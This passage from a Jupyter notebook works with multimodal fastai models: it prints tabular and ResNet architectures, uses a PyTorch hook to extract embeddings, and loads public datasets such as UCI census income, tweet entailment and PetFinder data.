30982, 30983, 30984, 30985, 30986, 30987, 30988, 30989, 30990, 30991, 30992, 30993, 30994, 30995, 30996, 30997, 30998, 30999, 31000, 31001, 31002, 31003, 31004, 31005, 31006, 31007, 31008, 31009, 31010, 31011, 31012, 31013, 31014, 31015, 31016, 31017, 31018, 31019, 31020, 31021, 31022, 31023, 31024, 31025, 31026, 31027, 31028, 31029, 31030, 31031, 31032, 31033, 31034, 31035, 31036, 31037, 31038, 31039, 31040, 31041, 31042, 31043, 31044, 31045, 31046, 31047, 31048, 31049, 31050, 31051, 31052, 31053, 31054, 31055, 31056, 31057, 31058, 31059, 31060, 31061, 31062, 31063, 31064, 31065, 31066, 31067, 31068, 31069, 31070, 31071, 31072, 31073, 31074, 31075, 31076, 31077, 31078, 31079, 31080, 31081, 31082, 31083, 31084, 31085, 31086, 31087, 31088, 31089, 31090, 31091, 31092, 31093, 31094, 31095, 31096, 31097, 31098, 31099, 31100, 31101, 31102, 31103, 31104, 31105, 31106, 31107, 31108, 31109, 31110, 31111, 31112, 31113, 31114, 31115, 31116, 31117, 31118, 31119, 31120, 31121, 31122, 31123, 31124, 31125, 31126, 31127, 31128, 31129, 31130, 31131, 31132, 31133, 31134, 31135, 31136, 31137, 31138, 31139, 31140, 31141, 31142, 31143, 31144, 31145, 31146, 31147, 31148, 31149, 31150, 31151, 31152, 31153, 31154, 31155, 31156, 31157, 31158, 31159, 31160, 31161, 31162, 31163, 31164, 31165, 31166, 31167, 31168, 31169, 31170, 31171, 31172, 31173, 31174, 31175, 31176, 31177, 31178, 31179, 31180, 31181, 31182, 31183, 31184, 31185, 31186, 31187, 31188, 31189, 31190, 31191, 31192, 31193, 31194, 31195, 31196, 31197, 31198, 31199, 31200, 31201, 31202, 31203, 31204, 31205, 31206, 31207, 31208, 31209, 31210, 31211, 31212, 31213, 31214, 31215, 31216, 31217, 31218, 31219, 31220, 31221, 31222, 31223, 31224, 31225, 31226, 31227, 31228, 31229, 31230, 31231, 31232, 31233, 31234, 31235, 31236, 31237, 31238, 31239, 31240, 31241, 31242, 31243, 31244, 31245, 31246, 31247, 31248, 31249, 31250, 31251, 31252, 31253, 31254, 31255, 31256, 31257, 31258, 31259, 31260, 31261, 31262, 31263, 31264, 31265, 31266, 31267, 31268, 31269, 31270, 31271, 31272, 31273, 31274, 31275, 31276, 31277, 31278, 31279, 31280, 31281, 31282, 31283, 31284, 31285, 31286, 31287, 31288, 31289, 31290, 31291, 31292, 31293, 31294, 31295, 31296, 31297, 31298, 31299, 31300, 31301, 31302, 31303, 31304, 31305, 31306, 31307, 31308, 31309, 31310, 31311, 31312, 31313, 31314, 31315, 31316, 31317, 31318, 31319, 31320, 31321, 31322, 31323, 31324, 31325, 31326, 31327, 31328, 31329, 31330, 31331, 31332, 31333, 31334, 31335, 31336, 31337, 31338, 31339, 31340, 31341, 31342, 31343, 31344, 31345, 31346, 31347, 31348, 31349, 31350, 31351, 31352, 31353, 31354, 31355, 31356, 31357, 31358, 31359, 31360, 31361, 31362, 31363, 31364, 31365, 31366, 31367, 31368, 31369, 31370, 31371, 31372, 31373, 31374, 31375, 31376, 31377, 31378, 31379, 31380, 31381, 31382, 31383, 31384, 31385, 31386, 31387, 31388, 31389, 31390, 31391, 31392, 31393, 31394, 31395, 31396, 31397, 31398, 31399, 31400, 31401, 31402, 31403, 31404, 31405, 31406, 31407, 31408, 31409, 31410, 31411, 31412, 31413, 31414, 31415, 31416, 31417, 31418, 31419, 31420, 31421, 31422, 31423, 31424, 31425, 31426, 31427, 31428, 31429, 31430, 31431, 31432, 31433, 31434, 31435, 31436, 31437, 31438, 31439, 31440, 31441, 31442, 31443, 31444, 31445, 31446, 31447, 31448, 31449, 31450, 31451, 31452, 31453, 31454, 31455, 31456, 31457, 31458, 31459, 31460, 31461, 31462, 31463, 31464, 31465, 31466, 31467, 31468, 31469, 31470, 31471, 31472, 31473, 31474, 31475, 31476, 31477, 31478, 31479, 31480, 31481, 31482, 31483, 31484, 31485, 31486, 31487, 31488, 31489, 31490, 31491, 31492, 31493, 31494, 31495, 31496, 31497, 31498, 31499, 31500, 31501, 31502, 31503, 31504, 31505, 31506, 31507, 31508, 31509, 31510, 31511, 31512, 31513, 31514, 31515, 31516, 31517, 31518, 31519, 31520, 31521, 31522, 31523, 31524, 31525, 31526, 31527, 31528, 31529, 31530, 31531, 31532, 31533, 31534, 31535, 31536, 31537, 31538, 31539, 31540, 31541, 31542, 31543, 31544, 31545, 31546, 31547, 31548, 31549, 31550, 31551, 31552, 31553, 31554, 31555, 31556, 31557, 31558, 31559, 31560, 31561, 31562, 31563, 31564, 31565, 31566, 31567, 31568, 31569, 31570, 31571, 31572, 31573, 31574, 31575, 31576, 31577, 31578, 31579, 31580, 31581, 31582, 31583, 31584, 31585, 31586, 31587, 31588, 31589, 31590, 31591, 31592, 31593, 31594, 31595, 31596, 31597, 31598, 31599, 31600, 31601, 31602, 31603, 31604, 31605, 31606, 31607, 31608, 31609, 31610, 31611, 31612, 31613, 31614, 31615, 31616, 31617, 31618, 31619, 31620, 31621, 31622, 31623, 31624, 31625, 31626, 31627, 31628, 31629, 31630, 31631, 31632, 31633, 31634, 31635, 31636, 31637, 31638, 31639, 31640, 31641, 31642, 31643, 31644, 31645, 31646, 31647, 31648, 31649, 31650, 31651, 31652, 31653, 31654, 31655, 31656, 31657, 31658, 31659, 31660, 31661, 31662, 31663, 31664, 31665, 31666, 31667, 31668, 31669, 31670, 31671, 31672, 31673, 31674, 31675, 31676, 31677, 31678, 31679, 31680, 31681, 31682, 31683, 31684, 31685, 31686, 31687, 31688, 31689, 31690, 31691, 31692, 31693, 31694, 31695, 31696, 31697, 31698, 31699, 31700, 31701, 31702, 31703, 31704, 31705, 31706, 31707, 31708, 31709, 31710, 31711, 31712, 31713, 31714, 31715, 31716, 31717, 31718, 31719, 31720, 31721, 31722, 31723, 31724, 31725, 31726, 31727, 31728, 31729, 31730, 31731, 31732, 31733, 31734, 31735, 31736, 31737, 31738, 31739, 31740, 31741, 31742, 31743, 31744, 31745, 31746, 31747, 31748, 31749, 31750, 31751, 31752, 31753, 31754, 31755, 31756, 31757, 31758, 31759, 31760, 31761, 31762, 31763, 31764, 31765, 31766, 31767, 31768, 31769, 31770, 31771, 31772, 31773, 31774, 31775, 31776, 31777, 31778, 31779, 31780, 31781, 31782, 31783, 31784, 31785, 31786, 31787, 31788, 31789, 31790, 31791, 31792, 31793, 31794, 31795, 31796, 31797, 31798, 31799, 31800, 31801, 31802, 31803, 31804, 31805, 31806, 31807, 31808, 31809, 31810, 31811, 31812, 31813, 31814, 31815, 31816, 31817, 31818, 31819, 31820, 31821, 31822, 31823, 31824, 31825, 31826, 31827, 31828, 31829, 31830, 31831, 31832, 31833, 31834, 31835, 31836, 31837, 31838, 31839, 31840, 31841, 31842, 31843, 31844, 31845, 31846, 31847, 31848, 31849, 31850, 31851, 31852, 31853, 31854, 31855, 31856, 31857, 31858, 31859, 31860, 31861, 31862, 31863, 31864, 31865, 31866, 31867, 31868, 31869, 31870, 31871, 31872, 31873, 31874, 31875, 31876, 31877, 31878, 31879, 31880, 31881, 31882, 31883, 31884, 31885, 31886, 31887, 31888, 31889, 31890, 31891, 31892, 31893, 31894, 31895, 31896, 31897, 31898, 31899, 31900, 31901, 31902, 31903, 31904, 31905, 31906, 31907, 31908, 31909, 31910, 31911, 31912, 31913, 31914, 31915, 31916, 31917, 31918, 31919, 31920, 31921, 31922, 31923, 31924, 31925, 31926, 31927, 31928, 31929, 31930, 31931, 31932, 31933, 31934, 31935, 31936, 31937, 31938, 31939, 31940, 31941, 31942, 31943, 31944, 31945, 31946, 31947, 31948, 31949, 31950, 31951, 31952, 31953, 31954, 31955, 31956, 31957, 31958, 31959, 31960, 31961, 31962, 31963, 31964, 31965, 31966, 31967, 31968, 31969, 31970, 31971, 31972, 31973, 31974, 31975, 31976, 31977, 31978, 31979, 31980, 31981, 31982, 31983, 31984, 31985, 31986, 31987, 31988, 31989, 31990, 31991, 31992, 31993, 31994, 31995, 31996, 31997, 31998, 31999, 32000, 32001, 32002, 32003, 32004, 32005, 32006, 32007, 32008, 32009, 32010, 32011, 32012, 32013, 32014, 32015, 32016, 32017, 32018, 32019, 32020, 32021, 32022, 32023, 32024, 32025, 32026, 32027, 32028, 32029, 32030, 32031, 32032, 32033, 32034, 32035, 32036, 32037, 32038, 32039, 32040, 32041, 32042, 32043, 32044, 32045, 32046, 32047, 32048, 32049, 32050, 32051, 32052, 32053, 32054, 32055, 32056, 32057, 32058, 32059, 32060, 32061, 32062, 32063, 32064, 32065, 32066, 32067, 32068, 32069, 32070, 32071, 32072, 32073, 32074, 32075, 32076, 32077, 32078, 32079, 32080, 32081, 32082, 32083, 32084, 32085, 32086, 32087, 32088, 32089, 32090, 32091, 32092, 32093, 32094, 32095, 32096, 32097, 32098, 32099, 32100, 32101, 32102, 32103, 32104, 32105, 32106, 32107, 32108, 32109, 32110, 32111, 32112, 32113, 32114, 32115, 32116, 32117, 32118, 32119, 32120, 32121, 32122, 32123, 32124, 32125, 32126, 32127, 32128, 32129, 32130, 32131, 32132, 32133, 32134, 32135, 32136, 32137, 32138, 32139, 32140, 32141, 32142, 32143, 32144, 32145, 32146, 32147, 32148, 32149, 32150, 32151, 32152, 32153, 32154, 32155, 32156, 32157, 32158, 32159, 32160, 32161, 32162, 32163, 32164, 32165, 32166, 32167, 32168, 32169, 32170, 32171, 32172, 32173, 32174, 32175, 32176, 32177, 32178, 32179, 32180, 32181, 32182, 32183, 32184, 32185, 32186, 32187, 32188, 32189, 32190, 32191, 32192, 32193, 32194, 32195, 32196, 32197, 32198, 32199, 32200, 32201, 32202, 32203, 32204, 32205, 32206, 32207, 32208, 32209, 32210, 32211, 32212, 32213, 32214, 32215, 32216, 32217, 32218, 32219, 32220, 32221, 32222, 32223, 32224, 32225, 32226, 32227, 32228, 32229, 32230, 32231, 32232, 32233, 32234, 32235, 32236, 32237, 32238, 32239, 32240, 32241, 32242, 32243, 32244, 32245, 32246, 32247, 32248, 32249, 32250, 32251, 32252, 32253, 32254, 32255, 32256, 32257, 32258, 32259, 32260, 32261, 32262, 32263, 32264, 32265, 32266, 32267, 32268, 32269, 32270, 32271, 32272, 32273, 32274, 32275, 32276, 32277, 32278, 32279, 32280, 32281, 32282, 32283, 32284, 32285, 32286, 32287, 32288, 32289, 32290, 32291, 32292, 32293, 32294, 32295, 32296, 32297, 32298, 32299, 32300, 32301, 32302, 32303, 32304, 32305, 32306, 32307, 32308, 32309, 32310, 32311, 32312, 32313, 32314, 32315, 32316, 32317, 32318, 32319, 32320, 32321, 32322, 32323, 32324, 32325, 32326, 32327, 32328, 32329, 32330, 32331, 32332, 32333, 32334, 32335, 32336, 32337, 32338, 32339, 32340, 32341, 32342, 32343, 32344, 32345, 32346, 32347, 32348, 32349, 32350, 32351, 32352, 32353, 32354, 32355, 32356, 32357, 32358, 32359, 32360, 32361, 32362, 32363, 32364, 32365, 32366, 32367, 32368, 32369, 32370, 32371, 32372, 32373, 32374, 32375, 32376, 32377, 32378, 32379, 32380, 32381, 32382, 32383, 32384, 32385, 32386, 32387, 32388, 32389, 32390, 32391, 32392, 32393, 32394, 32395, 32396, 32397, 32398, 32399, 32400, 32401, 32402, 32403, 32404, 32405, 32406, 32407, 32408, 32409, 32410, 32411, 32412, 32413, 32414, 32415, 32416, 32417, 32418, 32419, 32420, 32421, 32422, 32423, 32424, 32425, 32426, 32427, 32428, 32429, 32430, 32431, 32432, 32433, 32434, 32435, 32436, 32437, 32438, 32439, 32440, 32441, 32442, 32443, 32444, 32445, 32446, 32447, 32448, 32449, 32450, 32451, 32452, 32453, 32454, 32455, 32456, 32457, 32458, 32459, 32460, 32461, 32462, 32463, 32464, 32465, 32466, 32467, 32468, 32469, 32470, 32471, 32472, 32473, 32474, 32475, 32476, 32477, 32478, 32479, 32480, 32481, 32482, 32483, 32484, 32485, 32486, 32487, 32488, 32489, 32490, 32491, 32492, 32493, 32494, 32495, 32496, 32497, 32498, 32499, 32500, 32501, 32502, 32503, 32504, 32505, 32506, 32507, 32508, 32509, 32510, 32511, 32512, 32513, 32514, 32515, 32516, 32517, 32518, 32519, 32520, 32521, 32522, 32523, 32524, 32525, 32526, 32527, 32528, 32529, 32530, 32531, 32532, 32533, 32534, 32535, 32536, 32537, 32538, 32539, 32540, 32541, 32542, 32543, 32544, 32545, 32546, 32547, 32548, 32549, 32550, 32551, 32552, 32553, 32554, 32555, 32556, 32557, 32558, 32559, 32560]\n" ], [ "# understand the model architecture\nprint(tab_learn.model)\n\n# identify layer from where embeddings are extracted\ntab_learn.model.layers[1][0]", "TabularModel(\n (embeds): ModuleList(\n (0): Embedding(74, 18)\n (1): Embedding(117, 23)\n (2): Embedding(90, 20)\n (3): Embedding(17, 8)\n (4): Embedding(93, 20)\n (5): Embedding(8, 5)\n (6): Embedding(43, 13)\n (7): Embedding(16, 8)\n (8): Embedding(6, 4)\n (9): Embedding(7, 5)\n (10): Embedding(3, 3)\n (11): Embedding(10, 6)\n (12): Embedding(3, 3)\n )\n (emb_drop): Dropout(p=0.0, inplace=False)\n (bn_cont): BatchNorm1d(2, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n (layers): Sequential(\n (0): LinBnDrop(\n (0): Linear(in_features=138, out_features=200, bias=False)\n (1): ReLU(inplace=True)\n (2): BatchNorm1d(200, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n )\n (1): LinBnDrop(\n (0): Linear(in_features=200, out_features=100, bias=False)\n (1): ReLU(inplace=True)\n (2): BatchNorm1d(100, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n )\n (2): LinBnDrop(\n (0): Linear(in_features=100, out_features=2, bias=True)\n )\n )\n)\n" ] ], [ [ "## experiment: get_fastai_imgs_embs\n\nTo extract image embedding, check out this post\n\n- https://www.kaggle.com/code/abhikjha/fastai-pytorch-hooks-random-forest/notebook#Fastai---Tabular", "_____no_output_____" ] ], [ [ "# pytorch hook\nclass SaveFeatures():\n features=None\n def __init__(self, m): \n self.hook = m.register_forward_hook(self.hook_fn)\n self.features = None\n def hook_fn(self, module, input, output): \n out = output.detach().cpu().numpy()\n if isinstance(self.features, type(None)):\n self.features = out\n else:\n self.features = np.row_stack((self.features, out))\n def remove(self): \n self.hook.remove()", "_____no_output_____" ], [ "print(img_clf.model)\n# identify the layer from which you want to get embeddings \nimg_clf.model[1][4]", "Sequential(\n (0): Sequential(\n (0): Conv2d(3, 64, kernel_size=(7, 7), stride=(2, 2), padding=(3, 3), bias=False)\n (1): BatchNorm2d(64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n (2): ReLU(inplace=True)\n (3): MaxPool2d(kernel_size=3, stride=2, padding=1, dilation=1, ceil_mode=False)\n (4): Sequential(\n (0): BasicBlock(\n (conv1): Conv2d(64, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)\n (bn1): BatchNorm2d(64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n (relu): ReLU(inplace=True)\n (conv2): Conv2d(64, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)\n (bn2): BatchNorm2d(64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n )\n (1): BasicBlock(\n (conv1): Conv2d(64, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)\n (bn1): BatchNorm2d(64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n (relu): ReLU(inplace=True)\n (conv2): Conv2d(64, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)\n (bn2): BatchNorm2d(64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n )\n (2): BasicBlock(\n (conv1): Conv2d(64, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)\n (bn1): BatchNorm2d(64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n (relu): ReLU(inplace=True)\n (conv2): Conv2d(64, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)\n (bn2): BatchNorm2d(64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n )\n )\n (5): Sequential(\n (0): BasicBlock(\n (conv1): Conv2d(64, 128, kernel_size=(3, 3), stride=(2, 2), padding=(1, 1), bias=False)\n (bn1): BatchNorm2d(128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n (relu): ReLU(inplace=True)\n (conv2): Conv2d(128, 128, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)\n (bn2): BatchNorm2d(128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n (downsample): Sequential(\n (0): Conv2d(64, 128, kernel_size=(1, 1), stride=(2, 2), bias=False)\n (1): BatchNorm2d(128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n )\n )\n (1): BasicBlock(\n (conv1): Conv2d(128, 128, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)\n (bn1): BatchNorm2d(128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n (relu): ReLU(inplace=True)\n (conv2): Conv2d(128, 128, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)\n (bn2): BatchNorm2d(128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n )\n (2): BasicBlock(\n (conv1): Conv2d(128, 128, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)\n (bn1): BatchNorm2d(128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n (relu): ReLU(inplace=True)\n (conv2): Conv2d(128, 128, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)\n (bn2): BatchNorm2d(128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n )\n (3): BasicBlock(\n (conv1): Conv2d(128, 128, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)\n (bn1): BatchNorm2d(128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n (relu): ReLU(inplace=True)\n (conv2): Conv2d(128, 128, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)\n (bn2): BatchNorm2d(128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n )\n )\n (6): Sequential(\n (0): BasicBlock(\n (conv1): Conv2d(128, 256, kernel_size=(3, 3), stride=(2, 2), padding=(1, 1), bias=False)\n (bn1): BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n (relu): ReLU(inplace=True)\n (conv2): Conv2d(256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)\n (bn2): BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n (downsample): Sequential(\n (0): Conv2d(128, 256, kernel_size=(1, 1), stride=(2, 2), bias=False)\n (1): BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n )\n )\n (1): BasicBlock(\n (conv1): Conv2d(256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)\n (bn1): BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n (relu): ReLU(inplace=True)\n (conv2): Conv2d(256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)\n (bn2): BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n )\n (2): BasicBlock(\n (conv1): Conv2d(256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)\n (bn1): BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n (relu): ReLU(inplace=True)\n (conv2): Conv2d(256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)\n (bn2): BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n )\n (3): BasicBlock(\n (conv1): Conv2d(256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)\n (bn1): BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n (relu): ReLU(inplace=True)\n (conv2): Conv2d(256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)\n (bn2): BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n )\n (4): BasicBlock(\n (conv1): Conv2d(256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)\n (bn1): BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n (relu): ReLU(inplace=True)\n (conv2): Conv2d(256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)\n (bn2): BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n )\n (5): BasicBlock(\n (conv1): Conv2d(256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)\n (bn1): BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n (relu): ReLU(inplace=True)\n (conv2): Conv2d(256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)\n (bn2): BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n )\n )\n (7): Sequential(\n (0): BasicBlock(\n (conv1): Conv2d(256, 512, kernel_size=(3, 3), stride=(2, 2), padding=(1, 1), bias=False)\n (bn1): BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n (relu): ReLU(inplace=True)\n (conv2): Conv2d(512, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)\n (bn2): BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n (downsample): Sequential(\n (0): Conv2d(256, 512, kernel_size=(1, 1), stride=(2, 2), bias=False)\n (1): BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n )\n )\n (1): BasicBlock(\n (conv1): Conv2d(512, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)\n (bn1): BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n (relu): ReLU(inplace=True)\n (conv2): Conv2d(512, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)\n (bn2): BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n )\n (2): BasicBlock(\n (conv1): Conv2d(512, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)\n (bn1): BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n (relu): ReLU(inplace=True)\n (conv2): Conv2d(512, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)\n (bn2): BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n )\n )\n )\n (1): Sequential(\n (0): AdaptiveConcatPool2d(\n (ap): AdaptiveAvgPool2d(output_size=1)\n (mp): AdaptiveMaxPool2d(output_size=1)\n )\n (1): Flatten(full=False)\n (2): BatchNorm1d(1024, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n (3): Dropout(p=0.25, inplace=False)\n (4): Linear(in_features=1024, out_features=512, bias=False)\n (5): ReLU(inplace=True)\n (6): BatchNorm1d(512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n (7): Dropout(p=0.5, inplace=False)\n (8): Linear(in_features=512, out_features=2, bias=False)\n )\n)\n" ], [ "sf = SaveFeatures(img_clf.model[1][4])", "_____no_output_____" ], [ "# access dls from the trained classifier\ntest_df = df.sample(10)\nprint(test_df)\ntest_dl = img_clf.dls.test_dl(test_df, with_labels=True)\ntest_dl", " name label\n206 train/3/9959.png 3\n974 valid/3/9177.png 3\n46 train/3/9293.png 3\n1215 valid/7/8316.png 7\n635 train/7/9571.png 7\n908 valid/3/7312.png 3\n746 valid/3/7140.png 3\n1031 valid/3/8254.png 3\n951 valid/3/9283.png 3\n952 valid/3/8354.png 3\n" ], [ "# run img_clf through test data\n\npreds, _ = img_clf.get_preds(dl=test_dl)", "_____no_output_____" ], [ "# get embeddings of training data\nsf.features.shape", "_____no_output_____" ] ], [ [ "# 0) create datasets", "_____no_output_____" ] ], [ [ "from pathlib import Path\nnrows = 10**20\ndata_path='/content/drive/MyDrive/fastai_multimodal/datasets/'", "_____no_output_____" ] ], [ [ "## dataset0 (cnt, cat)\n\nThis example uses the\n[United States Census Income Dataset](https://archive.ics.uci.edu/ml/datasets/Census-Income+%28KDD%29)\nprovided by the\n[UC Irvine Machine Learning Repository](https://archive.ics.uci.edu/ml/index.php).\nThe task is binary classification to determine whether a person makes over 50K a year.\n\nThe dataset includes ~300K instances with 41 input features: 7 numerical features\nand 34 categorical features.", "_____no_output_____" ] ], [ [ "# Column names.\nCSV_HEADER = [\n \"age\",\n \"class_of_worker\",\n \"detailed_industry_recode\",\n \"detailed_occupation_recode\",\n \"education\",\n \"wage_per_hour\",\n \"enroll_in_edu_inst_last_wk\",\n \"marital_stat\",\n \"major_industry_code\",\n \"major_occupation_code\",\n \"race\",\n \"hispanic_origin\",\n \"sex\",\n \"member_of_a_labor_union\",\n \"reason_for_unemployment\",\n \"full_or_part_time_employment_stat\",\n \"capital_gains\",\n \"capital_losses\",\n \"dividends_from_stocks\",\n \"tax_filer_stat\",\n \"region_of_previous_residence\",\n \"state_of_previous_residence\",\n \"detailed_household_and_family_stat\",\n \"detailed_household_summary_in_household\",\n \"instance_weight\",\n \"migration_code-change_in_msa\",\n \"migration_code-change_in_reg\",\n \"migration_code-move_within_reg\",\n \"live_in_this_house_1_year_ago\",\n \"migration_prev_res_in_sunbelt\",\n \"num_persons_worked_for_employer\",\n \"family_members_under_18\",\n \"country_of_birth_father\",\n \"country_of_birth_mother\",\n \"country_of_birth_self\",\n \"citizenship\",\n \"own_business_or_self_employed\",\n \"fill_inc_questionnaire_for_veteran's_admin\",\n \"veterans_benefits\",\n \"weeks_worked_in_year\",\n \"year\",\n \"income_level\",\n]\n\ndf_url = \"https://archive.ics.uci.edu/ml/machine-learning-databases/census-income-mld/census-income.data.gz\"\ndf = pd.read_csv(df_url, header=None, names=CSV_HEADER, nrows=nrows)#[['age','capital_losses', 'citizenship', 'income_level', \"instance_weight\"]] #tmp: subset cols\n\n\ntest_df_url = \"https://archive.ics.uci.edu/ml/machine-learning-databases/census-income-mld/census-income.test.gz\"\ntest_df = pd.read_csv(test_df_url, header=None, names=CSV_HEADER, nrows=nrows)#[['age', 'capital_losses', 'citizenship', 'income_level', \"instance_weight\"]]\n\nprint(f\"Data shape: {df.shape}\")\nprint(f\"Test data shape: {test_df.shape}\")\n\n\n\nlabel_col = \"income_level\"\nweight = \"instance_weight\"\ndf[label_col] = df[label_col].apply(\n lambda x: 0 if x == \" - 50000.\" else 1\n)\ntest_df[label_col] = test_df[label_col].apply(\n lambda x: 0 if x == \" - 50000.\" else 1\n)\n\n#save a copy\ndf.to_csv(data_path+'df_income.csv')\ntest_df.to_csv(data_path+'test_df_income.csv')\n\n#dbck\ndf.tail()\n\n\n", "Data shape: (199523, 42)\nTest data shape: (99762, 42)\n" ], [ "!pwd", "/content/drive/MyDrive/multimodal_text_benchmark\n" ] ], [ [ "## dataset1 (txt+img)\n\nRef: https://keras.io/examples/nlp/multimodal_entailment/", "_____no_output_____" ] ], [ [ "import pandas as pd\nimport os\nimport tensorflow as tf\nimage_base_path = tf.keras.utils.get_file(\n \"tweet_images\",\n \"https://github.com/sayakpaul/Multimodal-Entailment-Baseline/releases/download/v1.0.0/tweet_images.tar.gz\",\n untar=True,\n)\n\ndf = pd.read_csv(\"https://github.com/sayakpaul/Multimodal-Entailment-Baseline/raw/main/csvs/tweets.csv\", nrows=nrows)\n\nimages_one_paths = []\nimages_two_paths = []\n\nfor idx in range(len(df)):\n current_row = df.iloc[idx]\n id_1 = current_row[\"id_1\"]\n id_2 = current_row[\"id_2\"]\n extentsion_one = current_row[\"image_1\"].split(\".\")[-1]\n extentsion_two = current_row[\"image_2\"].split(\".\")[-1]\n\n image_one_path = os.path.join(image_base_path, str(id_1) + f\".{extentsion_one}\")\n image_two_path = os.path.join(image_base_path, str(id_2) + f\".{extentsion_two}\")\n\n images_one_paths.append(image_one_path)\n images_two_paths.append(image_two_path)\nprint(df.columns)\ndf[\"image_1_path\"] = images_one_paths\ndf[\"image_2_path\"] = images_two_paths\n\ndf.drop(['image_1', 'image_2', 'id_1', 'id_2'], axis=1, inplace=True)\nlabel_col = 'label'\nweight = None\nnum_classes = len(df[label_col].value_counts())\nimg_path = '/root/.keras/datasets/tweet_images'\nimg_cols = [\"image_1_path\", \"image_2_path\"]\n\n\n#save a copy\ndf.to_csv(data_path+'df_entailment.csv')\n\n#dbck\ndf.tail()", "Index(['id_1', 'text_1', 'image_1', 'id_2', 'text_2', 'image_2', 'label'], dtype='object')\n" ] ], [ [ "## dataset2 (cnt, cat, txt)\n\nThe original task in Kaggle's <a href=\"https://www.kaggle.com/c/petfinder-adoption-prediction\" class=\"external\">PetFinder.my Adoption Prediction competition</a> was to predict the speed at which a pet will be adopted (e.g. in the first week, the first month, the first three months, and so on).", "_____no_output_____" ] ], [ [ "dataset_url = 'http://storage.googleapis.com/download.tensorflow.org/data/petfinder-mini.zip'\ncsv_file = 'datasets/petfinder-mini/petfinder-mini.csv'\n\ntf.keras.utils.get_file('petfinder_mini.zip', dataset_url,\n extract=True, cache_dir='.')\ndf = pd.read_csv(csv_file, nrows=nrows)\n\nlabel_col = 'AdoptionSpeed'\n\n#save a copy\ndf.to_csv(data_path+'df_adoption.csv')\n\n#dbck\ndf.tail()", "Downloading data from 